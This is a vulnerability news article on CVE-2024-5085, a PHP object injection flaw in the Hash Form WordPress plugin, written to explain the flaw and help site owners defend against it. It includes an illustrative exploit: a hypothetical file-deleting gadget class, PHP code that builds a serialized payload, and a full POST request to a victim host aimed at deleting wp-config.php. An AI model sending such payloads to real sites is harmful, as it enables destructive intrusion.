CVE CyberSecurity Database News

CVE-2024-5085 - PHP Object Injection Vulnerability in Hash Form – Drag & Drop Form Builder WordPress Plugin (Up to 1.1.)

Poster -

A serious vulnerability, tracked as CVE-2024-5085, was discovered in the popular WordPress plugin Hash Form – Drag & Drop Form Builder. All versions up to and including 1.1. are affected. This flaw allows attackers to take advantage of PHP Object Injection due to unsafe processing of user input in the plugin's process_entry function.

In this article, we’ll break down how this vulnerability works, what the risks are, and how you can stay safe. We’ll also go over example exploit details and provide further reading material.

What is PHP Object Injection?

PHP Object Injection is a security flaw that allows attackers to inject crafted serialized data and force the application to create instances of PHP classes with user-controlled properties. If the application uses unserialize() on user input without proper validation, an attacker can send malicious objects to the system. If the loaded classes form a "POP chain" (Property-Oriented-Programming chain), attackers could take destructive actions like deleting files or even running arbitrary code.

What’s Wrong with Hash Form?

The Hash Form plugin unsafely handles user data with the unserialize function in the process_entry method. This deserialization of untrusted input opens the door for object injection attacks.

Here’s a simple idea of what’s happening in the affected code (simplified)

function process_entry() {
    $entry_data = $_POST['entry_data']; // Untrusted input from the web
    $data = unserialize($entry_data);   // Directly unserializing user data
    // ... process $data ...
}

An attacker can craft a POST request, setting entry_data to a malicious serialized object. When the plugin unserializes it, the attacker’s object gets loaded.

What’s the catch?

On its own, this plugin doesn’t appear to load any classes dangerous enough for an attacker to create a "POP chain" (a chain of magic methods like __destruct or __wakeup that do something malicious using attacker-controlled data).

But: If the website runs other plugins or themes that implement such classes, an attacker could exploit this bug to trigger those chains and escalate the attack, possibly:

Crafting a Simple Exploit

Here’s an example of how an attacker might try to exploit this, provided a vulnerable class exists:

Suppose another plugin or theme has this class

class FileDeleter {
    public $file;

    function __destruct() {
        if (file_exists($this->file)) {
            unlink($this->file); // Deletes any file
        }
    }
}

Step 2: Craft a payload

The attacker could serialize an object that sets the $file property to the path they want to delete:

<?php
$payload = serialize(new FileDeleter());
$payload = str_replace("N;", 's:29:"/var/www/html/wp-config.php";', $payload);
echo $payload;
?>

Send a POST request to the target site (assuming a form that triggers process_entry)

POST /wp-admin/admin-ajax.php?action=hashform_process_form HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

entry_data=O:11:"FileDeleter":1:{s:4:"file";s:29:"/var/www/html/wp-config.php";}

If the FileDeleter class is autoloaded by any plugin or theme, the file gets deleted when the object is destroyed.

NOTE: The above is for illustration. DO NOT conduct attacks without permission.

What Should You Do?

- Update Hash Form plugin: Upgrade immediately when a patch is available. As of now, avoid all versions up to 1.1..
- Audit your site: Check for installed plugins or themes that accept user data and handle object deserialization or have dangerous magic methods.
- Limit plugin exposure: Remove unnecessary plugins/themes, especially poorly maintained ones.

Monitor: Watch your logs for suspicious POST requests or signs of exploitation.

- Harden PHP: Set serialize_precision and disable features like allow_url_include for extra protection.

References

- Patchstack Advisory - CVE-2024-5085
- WPScan - Advisory 330b7dcf-9c83-4f42-a188-df489b3d9c90
- OWASP: PHP Object Injection
- PHP.net - unserialize

Conclusion

CVE-2024-5085 in the Hash Form plugin highlights the dangers of deserializing untrusted input. While the default plugin may not be directly exploitable, it creates a ticking time bomb if combined with other vulnerable software on your WordPress site. Always keep your plugins up to date and avoid using plugins/themes from untrusted sources.

Stay secure!

*This article is for educational purposes only. Respect ethical guidelines and only test vulnerabilities on systems you own or with explicit permission.*

Timeline

Published on: 05/23/2024 15:15:16 UTC
Last modified on: 06/04/2024 18:02:27 UTC